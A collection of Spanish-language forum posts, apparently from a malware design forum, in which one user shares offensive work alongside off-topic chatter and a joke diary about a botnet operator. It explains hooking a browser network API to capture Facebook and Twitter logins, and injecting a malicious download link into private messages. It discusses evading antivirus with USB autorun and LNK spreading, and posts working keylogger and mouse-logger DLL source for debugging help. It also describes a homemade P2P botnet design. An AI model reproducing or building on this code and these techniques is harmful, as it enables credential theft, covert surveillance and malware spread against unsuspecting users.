Temas

  Bueno me decidi husmear en las reds sociales y empece con facebook logrando algo....  

 En muchos sitios por alli sobre todo en el blog de YST lei que para intercalar MP en Facebook habria que hookear apis de wininet y  en cierto grado es verdad, si hookeamos la api HttpSendRequestW en IExplorer podemos interceptar las credenciales del facebook antes de pasar por las ssl en el cuarto parametro de la API:

Código [Seleccionar] Expandir

BOOL HttpSendRequest(
 HINTERNET hRequest,
 LPCTSTR lpszHeaders,
 DWORD dwHeadersLength,
 LPVOID lpOptional,
 DWORD dwOptionalLength
);


 Obtenemos una cadena como esta:

Código [Seleccionar] Expandir

charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&lsd=CLE74&return_session=0&legacy_return=1&display=&session_key_only=0&trynum=1&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&lsd=CLE74&email=algunloco@hotmail.com&pass=algunpass&persistent=1&login=EntrarÜ
†
µ

 podemos filtrar esta cadena en el hook buscando señas como "charset_test=" y "email=" y guardarla en un archivo o enviarlas directamente por sockets ..  

 Pero este no es mi objetivo mi fin es lograr intercalar una URL maliciosa en un MP   .......

 Por lo que despues de debbugear y hookear varias apis de wininet decidi hacerlo a la Chuck Norris: "HOOKEANDO SEND" .....   ....

 En el momento de enviar un MP por el fakebook   IExplorer realiza un send enviando una cadena como esta:

 

Código [Seleccionar] Expandir

status=hola%20mundo&action=send_reply&home_tab_id=1&profile_id=100000155542630&target_id=0&app_id=&&composer_id=c4ce5f8ca5612e1419225556&hey_kid_im_a_composer=true&thread=1304306924347&msg_id&post_form_id=1c94d03e13c7811d1d4bc3f3c9faf420&fb_dtsg=-wA4J&lsd&_log_action=send_reply&_log_thread=1304306924347&_log_msg_id&ajax_log=1&post_form_id_source=AsyncRequestPOST /logout.php HTTP/1.1

 Como veran despues de status= esta el mensaje con unos feos %20 que sustituyen los espacios si queremos intercalar algun mensaje tendriamos que crear un buffer asi:

Código [Seleccionar] Expandir

status=Feliz%20dia%20de%20san%20Valentin%20http:\\lamerruso.com\\mibicho.exe%20

y le concatenamos la cadena original desde &action= quedando algo asi ....

Código [Seleccionar] Expandir

status=Feliz%20dia%20de%20san%20Valentin%20hola%20mundo&action=send_reply&home_tab_id=1&profile_id=100000155542630&target_id=0&app_id=&&composer_id=c4ce5f8ca5612e1419225556&hey_kid_im_a_composer=true&thread=1304306924347&msg_id&post_form_id=1c94d03e13c7811d1d4bc3f3c9faf420&fb_dtsg=-wA4J&lsd&_log_action=send_reply&_log_thread=1304306924347&_log_msg_id&ajax_log=1&post_form_id_source=AsyncRequestPOST /logout.php HTTP/1.1

 Y al enviar la cadena lleva la URL intercalada   .........

 Con Twetter estaba probando algo con el hook a la api HttpSendRequestW se puede obtener las credenciales filtrando una cadena como esta:

 

Código [Seleccionar] Expandir

authenticity_token=3c2e284418861cb85cb6994e3c1c1c3259fe1a7f&authenticity_token=3c2e284418861cb85cb6994e3c1c1c3259fe1a7f&return_to_ssl=&redirect_after_login=&session%5Busername_or_email%5D=twettermaniaco@hotmail.com&session%5Bpassword%5D=semeolvido&commit=Iniciar+Sesi%C3%B3n˜Úª

 se puede filtrar buscando señas y como veran alli estan las credenciales antes de pasar por las ssl   .........

 Iva a intentar intercalar twets maliciosos pero por alguna extraña razon la pagina de twetter tiene problemas   ......


 PD: No subo source aqui esta la idea   no quiero que algun "experto" propague malware asi no mas sin esforzarce XD  


 Saludos..  

  Tengo dias que no puedo ingresar ni a la web ni al foro ¿Esta caido?.... Ayer pude ingresar a la web pero habia una pagina en blanco que tenia un bonito mensaje referente a mi trasero   ......  

  Bueno la era Autorun.inf creo que esta llegando a su fin  en mi proyecto genero un autorun con ofuscacion aleatoria que solo era detectado por 3 AV entre ellos AVAST me parecia bien hasta que probe los 3 AV en otro pc de prueba con mi autorun los otros dos lo unico que hacen es borrar el autorun pero AVAST .... por heuristica  busca la ruta del exe en el autorun y lo detecta como Troyan Horse  no solo eso sino que borra todas las copias del exe en el pendrive  y al final aparece una ventanita diciendo si el usuario aceptaria enviar las muestras a AVAST para su analisis  si fuera una copia de PI o Biefrost no importara pero mi proyecto es 100% fud y eso no me gustaria para nada ......... Y es por mera heuristica ya que si copio el server en el Pen drive sin el autorun Avast no lo detecta  ........

  Me puse a investigar y lei un articulo sobre Stuxnet especificamente sobre la infeccion de dispositivos USB con LNKs y me parecio muy interesante  basicamente consiste en subir el server a algun webhosting y generar un acceso directo a esa url, ese acceso directo  se podria bindear con el server y cada vez que detecte un Dispositivo copiaria el acceso directo al pendrive con algun nombre llamativo o con algun nombre relacionado con los directorios u archivos del pendrive  de alguna manera stuxnet hace que el acceso directo se active cuando se accede al pendrive pero basicamente funciona ... 

   No se si alguien sabra algo mas para compartir? ...

  Saludos ....

  Bueno soy asiduo lector de este señor y es algo viejo el Paper pero esta muy completo y explicado   De muy buena lectura para el que quiere saber como funcionan las cosas y el paper en si da muchas luces para el diseño   ......

Código [Seleccionar] Expandir

http://www.malwareint.com/docs/MalwareInt-anual-2009.pdf


 Espero que les guste  

  Bueno hoy en dia hay una ola de avistamientos Ovnis en china asi como en la decada de los 40 y 50 en USA . Mi hipotesis es que esa gente concentra su estudio en las zonas mas desarrolladas ..... Ya ET sabe que USA no es la principal potencia   .......

http://www.larazon.es/noticia/5454-senores-pasajeros-cerramos-el-aeropuerto-porque-hemos-visto-un-ovni

[youtube=425,350]http://www.youtube.com/watch?v=tUhAPyU_ZN4[/youtube]



[youtube=425,350] http://www.youtube.com/watch?v=glY34RFnVMY&feature=fvst[/youtube]

  Tengo problemas con estas funciones ....

DLL

Código (cpp) [Seleccionar] Expandir



LRESULT CALLBACK Filtro(int nCode, WORD wParam, DWORD lParam) {
               if(nCode<0){
                  return(CallNextHookEx(gancho,nCode,wParam,lParam));
                  }
               if (lParam & (1 << 31)) {
                  char path[MAX_PATH];
                  FILE *datos;
                  BYTE KeyboardState[256];
                  GetKeyboardState(KeyboardState);
                  WORD CharValue;
                  strcpy(path,getenv("USERPROFILE"));
                  strcat(path,"\\Shellx64\\SPACK\\KLG.KL");
                  if(ToAscii(wParam,0,KeyboardState,&CharValue,0) > 0){
                      if((datos=fopen(path,"at"))==NULL){
                                 return CallNextHookEx(gancho,nCode,wParam,lParam);
                                 }
                         fprintf(datos,"%c",(char)CharValue);
                         fclose(datos);
                  }
               }
                                           
               return CallNextHookEx(gancho,nCode,wParam,lParam);
}
LRESULT CALLBACK FiltroMouse(int nCode, WORD wParam, LPARAM lParam)
{
               if(nCode!=HC_ACTION )
               {
                  return(CallNextHookEx(ganchom,nCode,wParam,lParam));
                  }  
               else
                 switch(wParam)
                      {
                      case WM_LBUTTONDOWN:
                          {
                           PMOUSEHOOKSTRUCT MH=(PMOUSEHOOKSTRUCT)lParam;
                           GuardarPosicion(MH->pt.x,MH->pt.y) ;
                           Sleep(200);
                           break;
                            }
                      default:
                        return CallNextHookEx(ganchom,nCode,wParam,lParam);
                     }
                                           
return CallNextHookEx(ganchom,nCode,wParam,lParam);
}
EXTERN_C __declspec(dllexport)int CreaHook(BOOL Instala, HINSTANCE DLLInst,char* DIRKL) {
   char path[MAX_PATH];              
     strcpy(path,getenv("USERPROFILE"));
     strcat(path,"\\Shellx64\\SPACK\\KLG.KL");  
     FILE *datos;
   if(Instala==TRUE) {
                         LoadDllss();
                         if((datos=fopen(path,"at"))!=NULL)
                         {  
                            fprintf(datos,"%s","IniciandoKL");
                            fprintf(datos,"%s",DIRKL);
                            fclose(datos);
                          }
                         gancho=MySetWindowsHook(WH_KEYBOARD,(HOOKPROC)Filtro,DLLInst,0);
                         
                         if(gancho==NULL){
                                return 0;
                         }
                         else{
                                return 1;
                         }
                    }else{
                        if((datos=fopen(path,"at"))!=NULL)
                         {  
                            fprintf(datos,"%s","TerminandoKL");
                            fprintf(datos,"%s",DIRKL);
                            fclose(datos);
                          }
                        return UnhookWindowsHookEx(gancho);
                         
                  }
}
EXTERN_C __declspec(dllexport)int CreaHookMouse(BOOL Instala, HINSTANCE DLLInst,char* DIRKL) {
      char path[MAX_PATH];              
     strcpy(path,getenv("USERPROFILE"));
     strcat(path,"\\Shellx64\\SPACK\\KLG.KL");  
     FILE *datos;            
                 if(Instala==TRUE) {
                         LoadDllss();
                          if((datos=fopen(path,"at"))!=NULL)
                         {  
                            fprintf(datos,"%s","IniciandoBKER");
                            fprintf(datos,"%s",DIRKL);
                            fclose(datos);
                          }
                       
                         ganchom=MySetWindowsHook(WH_MOUSE,(HOOKPROC)FiltroMouse,DLLInst,0);
                         
                         if(ganchom==NULL){
                                return 0;
                         }else{
                                return 1;
                         }
                  }else{
                        if((datos=fopen(path,"at"))!=NULL)
                         {  
                            fprintf(datos,"%s","TerminandoBKER");
                            fprintf(datos,"%s",DIRKL);
                            fclose(datos);
                          }
                      return UnhookWindowsHookEx(ganchom);
                         
                    }
}

main

Código (cpp) [Seleccionar] Expandir


main()
{
HMODULE Dll=LoadLibraryA(DIRKL);
Funcion = (LPFuncion)GetProcAddress(Dll,"CreaHook");
FuncionM = (LPFuncionM)GetProcAddress(Dll,"CreaHookMouse");
//INY=new Inyector(INFO->Masterdir ,CFS->RTKNAMEdll,INFO->SoyAdm);
int lp=0;
IniciarKeyLog();
bool banana=false,banana1=false;;
while(1)
   {
   
strcpy(LINKK,"NULL");
strcpy(LINKVINS,"NULL");
EnumWindows((WNDENUMPROC)EnumProc1,lp);
if(strcmp(LINKK,"NULL")!=0&&!banana)
  {
banana=true;
FuncionM(TRUE,Dll,LINKK);
  }
    if(strcmp(LINKK,"NULL")==0&&banana)
  {
       banana=false;
FuncionM(FALSE,Dll,LINKK);
  }
if((strcmp(LINKVINS,"NULL")!=0||strcmp(LINKK,"NULL")!=0)&&!banana1)
  {
banana1=true;
Funcion(TRUE,Dll,LINKVINS);
  }
    if((strcmp(LINKVINS,"NULL")==0&&strcmp(LINKK,"NULL")==0)&&banana1)
  {
       banana1=false;
Funcion(FALSE,Dll,LINKVINS);
  }
Crono1++;
Crono2++;
    Sleep(3000);
    }
return 0;
}


 El pedaso de codigo del main es un extracto del main principal de mi programa ....
En si lo que intento hacer es detectar ciertas ventanas y si estan activas activar los hooks todo funciona de maravilla pero me interesa que al momento d eno existir ninguna ventana de interes los hooks sean desinstalados... por cuestiones de optimizacion ....... Pero al momento de cerrar la ventana de interes, la aplicacion desinstala los hooks perfectamente, pero explorer.exe, iexplorer.exe y firefox.exe rebotan unos feos errores que los obliga ha cerrar   y ya saben el escandalo que se forma cuando se cierra explorer por lo que esto no me sirve   claro despues de reiniciar los serviciso tanto la dll como el exe siguen trabajando sin problemas y los hooks quedan desinstalados .... Se que hay que pulir un hook para que detecte teclas invisibles como TAB, F1 las flechas y todas esas cosas pero primero quiero que los hooks se instalen y desinstalen a la perfeccion.......

Algun Cable?

 Tambien se puede dejar ese puñal alli metido y no deshokearlos   pero eso seria mucha data irrelevante ...

Saludos ....

  Se que esto va en el subforo de c++ pero he obtenido mas ayuda aqui que en ese subforo 

  Bueno no se si los usuarios han notado un fuerte crecimiento en paginas infectadas y campañas de propagacion de malware  .... en una semana he sido infectado 4 veces solo navegando y accidiendo a paginas de "confianza"..

  Explico:

  Hace 5 dias fui victima de un muy picaro worm P2P muy bien elaborado que igual me fue muy facil eliminar...

  Dos dias despues descargue un Pdf y venia con su respectivo regalito ...  un lindo troyano bancario el cual a las pocas horas de infeccion intente acceder a mis cuentas bancarias y al escribir el sitio del banco en el exploraror me aparecio un lindo cartelito del firewall de windows diciendome que IExplorer necesitaba permisos para "Abrir Puertos"  ....... Otra vez avira solito se lo cargo ....... 


  Hace dos dias enfrente un monstruo del cual no hay ninguna info en internet, y el puto binario me lo cargue por lo que no pude recojer una muestra  , la custion empezo al ingresar a una pagina cuyo nombre omito por custiones personales  .... lo cierto es que IExplorer Peto por lo que lo termine desde el taskmgr ..... de una vez se me prendio la luz de la desconfianza  ...... Al rato Avira quedo nockaut , y el firewall de windows quedo desactivado  de ninguna manera pude reiniciar los dos servicios al ver esto desconecte el modem y lo guarde en una gabeta con llave ...... SO Xp actualizado, avira version completa actualizada  .. IExplorer 8 actualizado ..... Prosigo reinicie en Modo a prueba de fallos y pude arrancar el avira..... hice un scan dos trollanos de caracteristicas diferentes guardados en appdata, y Userprofile, facil de borrar el tercero era la peor de mis pesadillas un archivo .Sys guardado en %Systemroot%\\drivers detectado por heuristica como TR\Agent586 a lo cual por su puesto avira no pudo borrar .....  .......

  El archivo se alojo como kijpdhl.sys y creo una llave en HKLM\\Curren controlSet2\\Services ....  con el nombre kijpdhl.sys y claro no podia ver lo que habia dentro ni siquiera como administrador  ... Lo mas lindo fue al intentar buscar el archivo no podia abrir la carpeta drivers  para acceder tuve que hacerlo desde cmd y escribiendo la palabra system32 con codigos Alt es decir%%

  Al ver todo esto solo quedo el plan c que tengo para estos casos .... ¿Formatear? pues no 10K canciones bajadas por el emule incontable codigo y documento que no tenia donde meterlos XD .... Asi que desempolve un HD con una version limpia de windows y avira instalado, instale el had y arranque la maquina por alli para luego cargarme el driver ese XD .......

  Sorpresa: al hacer esto los driver de la tarjeta de red quedaron daños y no hubo forma humana de arreglar esto por lo que tuve que reinstalar todos los drivers ......

  El Archivo Kijpdhl.sys pesa 505KB  que es demasiado para ser malware asi que debe tener muchos juguetes para entretener a las victimas  .......


  Hoy intente leer esta noticia....

http://www.csospain.es/Nuevo-uso-de-la-botnet-Zeus-Robar-codigos-de-acceso-bancario/sección-actualidad/noticia-100333

  Y me aparecio un lindo cartelito del IEXPLORER diciendome que mi PC estaba bajo ataque de malware    Por lo que estoy corriendo el AV de nuevo  ....


  Voy a desempolvar una vieja version de OpenSuse, y la instalare en una particion para ver si puedo navegar en paz .....

  Windows esta bajo ataque hoy mas que nunca XD .....

  Bueno eso y despues dicen que tenemos libertad de expresion    .......

  Gracias a dios y existen los proxys .....

 


 



                                                          Tontos de Cantv 

  Ayer estaba huzmeando en la red p2p y encontre un bonito rar con el nombre "Poker Bot"  , lo descargue y pudo mas la Curiosidad que la Precaucion asi que me dije "A ver que hay aqui si me infecto Al diablo" ......

Aqui una muestra de lo que baje no es el original que baje ayer ya que fue exterminado ...   asi que busque un archivo relacionado cuyo nombre  estaba en el code del bicho y aqui esta ...

http://www.multiupload.com/UPFEC0XD88

 Bueno me quede esperando el cuadro de dialogo e informacion de instalacion de mi "Poker Bot", en vez de eso el instalador abrio el Firefox y me direcciono a una pagina de compras online pero de mi poker Bot nada   ... Asi que dije "Me jodieron", abri el administrador de tareas (Por lo menos abrio) y alli estaba un lindo proces SYSTEM con el nombre wins.exe, ademas note que cada 10 sg s eejecutaba una cosa llamada 7Zip.exe, eran las 2 am asi que apague la perola y me fui a dormir  .........

 Hoy me levanta encendi el PC y note sierta lentitud, el centro de seguridad de windows estaba en rojo y al abrir estaba el firewall de windows desactivado, y mi AV Avira estaba desactualizado, y desactivado  ... lo primero que hice fue actualizar el AV.., hice un scan detecto el wins.exe pero cuando lo estaba borrando la pc se apago   asi que reinicie en modo a prueba de fallos y lo volvi a correr .......

 Al buscar con regedit el famoso wins.exe estaba instalado como servicio con el nombre Windows Internet Name Service, la cual borre por supuesto y tenia una llave para permisos en el firewall de windows , tambien borrado XD....... Alli vi el Directorio donde estaba esa cosa yo crei que era alguna copia de spynet, Biefrost, sub7 a lo mucho el rxbot pero cuando abro el directorio     .....

 

 Vi carpetas como incoming, archivos . meat, nodos.dat   asi que me di cuenta que esto no era algo normal tiene toda la estructura de un Bot P2P   Abri la Carpeta Incoming y miren .......

 

 Esa captura fue sepues que pasara el avira por alli, habian por lo menos 100 archivos rar cuyos nombres Ivan desde Hack MSN.rar hasta Conter Strike 1.rar  , lo mas raro es que revise el emule y esa carpeta no aparece compartida   por lo que intuyo que esa cosa inyecta el emule y envia info de esos archivos para compartir via hooks........

 Luego revise Server.met y encontre esto

 

à   XP0á   

 88.80.28.48

 88.80.28.48

   
     users     files    
    
    
‡    
ˆ    
‰    
' Unknown
' Unknown
'    
"    &k¡`5   


38.107.161.96


38.107.161.96

   
     users     files    
    
    
‡    
ˆ    
‰    
' Unknown
' Unknown
'    
"    Ô?Î#'   


212.63.206.35


212.63.206.35

   
     users     files    
    
    
‡    
ˆ    
‰    
' Unknown
' Unknown
'    
"    Sé7"   

 83.233.30.55

 83.233.30.55

   
     users     files    
    
    
‡    
ˆ    
‰    
' Unknown
' Unknown
'    
"    :÷æ'   

 58.247.5.230

 58.247.5.230

   
     users     files    
    
    
‡    
ˆ    
‰    
' Unknown
' Unknown
'    
"    sïä   

 115.239.228.194

 115.239.228.194

   
     users     files    
    
    
‡    
ˆ    
‰    
' Unknown
' Unknown
'    
"    U(l‡   

 85.17.40.108

 85.17.40.108

   
     users     files    
    
    
‡    
ˆ    
‰    
' Unknown
' Unknown
'    
"    Ô³Žˆ   

 212.179.18.142

 212.179.18.142

   
     users     files    
    
    
‡    
ˆ    
‰    
' Unknown
' Unknown
'    
"    &k .5   


38.107.160.46


38.107.160.46

   
     users     files    
    
    
‡    
ˆ    
‰    
' Unknown
' Unknown
'    
"    X¿äBÇ   


88.191.228.66


88.191.228.66

   
     users     files    
    
    
‡    
ˆ    
‰    
' Unknown
' Unknown
'    
"    Ï¶,Û   

 207.182.157.130

 207.182.157.130

   
     users     files    
    
    
‡    
ˆ    
‰    
' Unknown
' Unknown
'    
"    u‡‰t¸"   

 117.135.137.116

 117.135.137.116

   
     users     files    
    
    
‡    
ˆ    
‰    
' Unknown
' Unknown
'    
"    

 Si pueden ver alli hay una lista de Ips que seguro estan infectadas y dado el nombre del archivo apuesto que son supernodos y una de esas ha de ser la del BoboMaster  ......

 Wins.exe es detectado por avira como "TR/ATRAPS G2", y esta cosa instala otro malware "7Zip.exe" que es detectado como "TR/Mowidin G2", No infecta Dispositivos USB ni tampoco ejecutables ........ El archivo nodos.dat esta cifrado   .....

 Al buscar la muestra para subir vi esto ...

 

 Como veran en el circulo se puede ver que hay 561 fuentes disponibles asi que no es muy grande la red si tomamos en cuenta que todas esas pc estan infectadas ..... En mi opinion esta en gestacion   ....

 Alli les dejo el binario para ver que mas le pueden sacar   ........

 No tiene mucho de nuevo lo que me llama la atencion es que es P2P   ....

 Saludos ...

  Bueno ayer en cadena nacional vi la exhumacion del Venezolano mas grande que ha pisado la tierra, la verdad que todo el tiempo veia a BOLIVAR como un mito un personaje en la historia, pero ayer al ver sus restos mortales no pude contener la emocion y varias lagrimas brotaron de mis ojos, y me di cuenta que el no es un mito, el existio y alli esta sus restos mortales su legado hoy esta mas  vigente que nunca  en el mundo y cada palabra y cada carta que el escribio hoy cobra mas vigencicia que nunca. El fue es y sera el gran Latinoamericano que, como el vienen al mundo cada quinientos años....


 Viva mi PADRE el LIBERTADOR de Ameica   ........



 AHORA JOALA Y NUESTRO PADRE HAYA MUERTO DE TUBERCULOSIS, Y NO SEA OTRA COSA POR QUE ¿SI NO? ......   EL ODIO QUE VOY HA TOMAR CONTRA CIERTAS PERSONAS VA HA SER GIGANTESCO 

  Si Alemania va a la final mas de la mitad de los jugadores en el campo seran del Bayern de Munich.

Metersacker
Robben
Sneijder
Friedrich
Lahm
Muller
Podolski
Cacau
Shweinstaiguer
Kerida
Klose
Van Bomel

 Y otros mas que se me escapan   ......

 De Razon que el Bayern Le dio vacaciones a la recepcionista y Tiene las oficinas cerradas, muchas llamadas de Madrid y Londres XD  




Pa que mas  

15:06:2009 Hoy me compre una PC nueva una Corel Duo de 2Ghz. 1 Giga de Ram y una tarjeta de Video de 1 Giga para jugar Los Sims 3 jeje . Tambien compre un Moden Inalambrico el cual vuela a mas de 250 Kb xs para navegar en internet y husmear en eso del jaquing .....

16:06:2009 Hoy me vi una Pelicula Vieja pero muy buena: "JUEGOS DE GUERRA" que fino ese tipo de verdad se iva ha hechar el mundo desde la cochera de su casa XD esto del jaquing mola mañana husmeare en las paginas de jaquing a ver que aprendo ....

17:06:2009 En Taringa me dijeron que el mejor sitio es elhacker.net asi que me cree un usuario alli quize utilizar el nick  Jaixxon Jax que me gusta pero ya esta ocupado asi que cree uno bien Bueno: Jaquer Cul y mi primer Post es una pregunta muy interesante: ¿Como hago para jaquiar las claves de hotmail y de fasebuk? ufffs apuesto a que hay muchos gurus del sitio me responderan .........

18:06:2009 Hoy intente de loggearme con mi nick y me dice que el usuario no existe ha de ser un error en la pagina, y el Post que cree no lo veo por ningun lado ¿Que habra pasado? asi que cree otro usuario y Pregunte en Foro Libre: ¿que habia pasado con mi nick y mi Post? un Tipo llamado Novlucker me respondio que mi Post habia violado las reglas del Foro y mi cuenta habia sido baneada a lo que yo respondi: ¿que jodido foro  es este si no hackean cuentas de hotmail  entonces que hacen? nadie me respondio otra vez no me puedo loggear con el nuevo nick XD ...

19:06:2009 Bueno hoy creare otro usuario pero no dire que soy jaquer cul para que no me baneen, mi nuebo usuario es Mr Cuco

19:06:2009 al rato: Ufff hay una zona de analisis y diseño de Malware hay gente que sabe mucho pero no les entiendo nada en un hilo lei que necesitaba un keyloger para capturar los datos y un RAT para sacarlos del PC veo mucha teoria pero no veo un puto link de un RAT PARA DESCARGAR esta gente como que vive de hablar paja y no hacen nada XD. Bueno intentare hacerme mi propio Rat. Asi que cree un Post :¿ Que tengo que aprender para hacer un RAT? a lo que despues de insultos y tomada de pelos alguien me respondio que tenia que aprender a programar C++ y Asm Inline:! Bueno manos a las obra¡

20:06:2009 Me vaje unos Pok de la zona de descarga pero que va no entiendo ni PIO Hay un Manual de RotKits de EON se be que sabe el TIO pero la verdad es que no se por dende entrarle, asi que cree un Post en el SubForo de C++ ¿Algun Manual de C++ para principiante? a lo que un TIPO me respondio que con Un manual de Deitel y con las SDK nadien me detenia UFFFF apouesto a que despues de leerme esos manuales sere todo un jaquer ha descargarlo .....

21:06:2009 Nooo que va ese fulano manual de deitel es de mas de 1000 paginas y las SDK estan en ingles y es una maraña de articulos que me tomara toda la vida estudiarlo ¿No habra otra manera mas facil de ser jaquer?

22:06:2009 Uuuuf estuve navegando y encontre un sitio llamado CPH es SUPER hay manuales de no mas 10 paginas y hay un sinfin de links de Rats para entretenerme esta gente si que sabe de jaqueo no como los de elhacker.net que no hacen sino hablar paja en los Posts XD

23:06:2009 Hoy me he bajado el SpyNet pero no se, cuando trato de descomprimirlo se borra un guru en CPH me dijo que tenia que desactivar el AV y el Firewall asi que desinstale el AV y El Firewall para trabaja,r jaque que se respeta no utiliza AV XD ......

30:06:2009 Que va he enviado como mil emails y he inundado los foros con un link a mi rat en MediaFire y nada mis victimas no me aparecen.¿ por que sera?....

01:07:2009 Un tipo me dijo que es por que noe staba FUD asi que ahora necesito un crypter para dejarlo FUD.. estuve huzmenado un Rato y CPH es una factoria de Crypters XD asi que lo puse FUD y lo subi a FileTube jeje ahora si apareceran mis victimas XD ..

02:07:2009   UFFF que bien tengo 100 Pcs infectadas con Spynet que jaquer soy he activado el keyloger en todas las victimas y me ha empezado ha llegar las claves de hotmail uffff apuesto a que hay cosas interesantes en esos correos.

03:07:2009 Nooooo  puras notificaciones de foros y de fasebuk pero nada interesante no veo los planos de una Bomba Atomica o alguna clave bancaria por alli esto me empieza aburrir ...

10:07:2009 ¿Que ha pasado? mis victimas no me aparecen ¿sera que todas las PC estan apagadas? Pregunte en el foro de CPH y me dijeron que el crypter ya no es FUD y que los AV an borrado el server en todas las victimas XD

11:07:2009 Bueno lei en otro Post que los RATS ya no molan y ahora la moda son unas cosas llamadas Botnets asi que me puse a investigar .......

12:07:2009 Uuuuf esto de las Botnes si que son de dioses de la red, quiero tener una pero ¿En CPH no hay ni un solo link para descargar? asi que me toco mudarme a Openscc alli si ha Bots como arroz a ver cual me descargo lo unico es que todo esta en INgles XD ...

13:07:2009 Ufff he contactado a un Hacker Ruso "Magic" este tipo si es un hacker no como los de elhacker.net me ofrecio la zeus con el builder en 2 000 $ me garantizo que con esta cosa ganaria millones en poco tiempo me dio su cuenta de Paypal para pagarle....

14:07:2009 Que raro el tipo es de Rusia pero la cuenta en Paypal esta en Nigeria eso sera por que el tipo es el padrino del infra mundo ya le deposite los 2000 $ y ahora estoy esperando el link del bot via email ......

15:07:2009 Todavia estoy esperando debe ser que el bot es tan grande que no ha terminado de subirlo ...

16:07:2009 Nada no me ha llegado nada....

17:07:2009 Nada

18:07:2009 .........

19:07:2009 Creo que me robaron

20:07:2009 Busque al tipo en el foro al parecer lo banearon por ripper , seguro violo a alguien pobrecito .....

21:07:2009 Me ultrajaron no hay email XD

22:07:2009 Bueno ahora hare negocios con vendedores certificados que incordio XD ..... ahora si tengo la zeus me costo 3000 $ pero tengo que instalar un poco de cosas en mi pc como apache, sql optimizer y otras joda mas seguro debe funcionar como el spynet asi que instalare la C&C en casa jeje .......

23:07:2009 Uuuuuf que super tengo 20K bots y fuen en cuestiod de 24 horas soy todo un jaquer a ver cuando me empiezan a llegar las clabes jeje .........

24:07:2009 Bueno ley en un Post en opensc que como ahora soy todo un BoboMaster ahora tengo que cuidarme las espaldas asi que cree un disco virtual con TrueCrypt con una contraseña de 32 caracteres alfanumericos que solo esta en mi memoria, instale Eraser y lo programe a utilizar la rutina de 24 pasadas para borrar los logs, archivos temporales de internet, cookies y todas esas cosas para maxima seguridad lo programe para que haga todo eso cada media hora ¿Uno nunca sabe?, Me baje una cosa que se llama DBan en caso qeu la poli toca la puerta meto ese disket en la pc y se borran todos los datos tambien lo programe con 24 pasadas , y para culminar coloque un Pote de Acido sulfurico encima del Cpu en caso de emergencia solo tengo que regar el acido en mi pc y adios pruebas jejej ahora si me siento como John Travolta en esa pelicula que no me acuerdo .......

25:07:2009 Me empezaron ha llegar Claves Bancarias asi que me hice de una cuenta ICQ para contactar y reclutar a las mulas que raro el pc anda algo lento ya tengo 70K Bots

26:07:2009 Uuuuuuf mi primer loan jeje 1000$ facil

30:07:2009 Joder un pez gorde de HSBC uuuf esta vale por lo menos 10K dolares estuve revisando con netstat mis puertos y tengo una conexion saliente con un servidor en Uckrania ...... ha de ser el servidor de soporte jeje esto funciona como una empresa XD


07:08:2009 joder ya tengo 50k Dolares asi que me fui para el pueblo compre una cama 2x2 un stereo nuevo, un televisor de plasma y el resto lo guarde en el banko me siento como Vito Corleone

08:08:2008 Hoy no quiso arrancar la PC se daño el disco duro que falla pero no importa para eso hay pasta XD 90K Bots y aumentando ....

09:08:2008 se me olvido la clave del disco virtual asi que me toco que formatear y crear un disco con una clave de 4 digitos para que no se me olvide .... 100K Bots XD

20:08:2008 Joder el disco duro nuevo me aparecio con varios clusters dañados por que sera eso seguro sera el Trabajo de la C&C ...........

24:08:2008 100K dolares me compre un Mustang y ahora tengo mas Oro en el cuerpo que Don Omar jaja

25:08:2008 Disco duro dañado otra vez a formatear XD....

30:08:2008 Joder el dominio que utilizaba la C&C esta bloqueado eso segurom fue que expiro no importa activare el otro dominio jeje..

09:09:2008 He estado revisando las estadisticas de la red y hay 150 Pcs infectadas en Seattel EEUU lo mas sorprendente es que no tienen historial de navegacion, ni clavez ni nada seguro hay mucho ocioso alla jaja ......

17:09:2008 Otro Dominio Bloqueado que raro actualizare el Bot ....

24:09:2008 Tremendo problema las cuentas que me estan llegando estan vacias y las mulas me quieren patear el trazero ¿Por que sera?

27:09:2008  Uuuuuf hoy me llego un Pez super gordo una Cuenta en CitiBank con 10Millones de verdes con esta me retiro, que raro mi pc se reinicio cuando intente ver los screenchoots y la victima era una de esas computadoras inactivas en Seattel EEUUU baaaaaaaa

28:09:2008 Hoy llegue a casa y mi madre me dijo que unos tecnicos de mi ISP habian ido a la casa revisar el modem que estaba dañado que raro....

01:10:2008 Ha de haber muchos modems dañados por que al frente esta la camioneta de mi ISP y no se han ido ....

02:10:2008 Se fue la Camioneta de mi ISP y ahora hay una de La ompañia de Electricidad ..... 100K Bots si quiero mas tengo que montar otra C&C

03:10:2008 El Pote de hacido empezo a gotear asi que lo cambie de embase jeje .... el que tenia era de plomo asiq ue le puse uno de aluminio asi se ve mas estetico .....

04:10:2008 Joder no hay Bots no hay dominio no hay conexion a internet no hay nada ademas tengo mas de una semana que no contacto a las mulas seguro se cansaron y se fueron a vivir la vida feliz XD ..

05:10:2008 ***** Bots no aparecen son 100K ahora que hago: Sono el timbre uuuuf es la poli a formatear con DBAN XD ...

5 Minutos Despues: El timbre esta sonando "Ya Voy esperen que me estoy bañando" Este DBAN es muy lento no termina de borrar los datos a ver el acido oooooo no el gato esta debajo de la pc que espectaculo dios mio.. "Joder Tumbaron la Puerta  No señor yo no fui mi Pc es un Prox......................."


  Jeje espero que les guste 

                              

XRayBNT Bot P2P  

 ¿Que es XRayBNT?

 No es una copia de la RXBot faltaba mas el nombre se me vino por por la pronunciacion de la letra x en el alfabeto fonetico de la Marina de mi pais
XRayBNT por BotNet es un Bot Yo lo llamo P2P pero habran muchos detractores utiliza una serie de Dominios para inicializarce esos dominios lo podes manipular desde el archivo configuracion.cpp el cual he borrado por cuestiones de sucurity.

 

¿Como funciona?

 En una fase inicial al no existir BD de nodos el Bot con una lista de dominios en su codigo iniciara esta busqueda y descargara una BD de Nodos dejando su ip en el server del dominio si el dominio no esta activo el bot enganchara el dominio y hara veces de supernodo .... al existir BD de nodos esto se puede suprimir.

 Eexiste un  nodo central el cual hace de BotMaster y en el cual deberas autentificarce para manipular esta red si ven el codigo estos nodos cambian cada cierto tiempo ... despues que la computadora sea vulnerada el bicho brinca el firewall inyectandose en los clientes P2P   logrando abrir puertos y hacer las veces de supernodo ......  

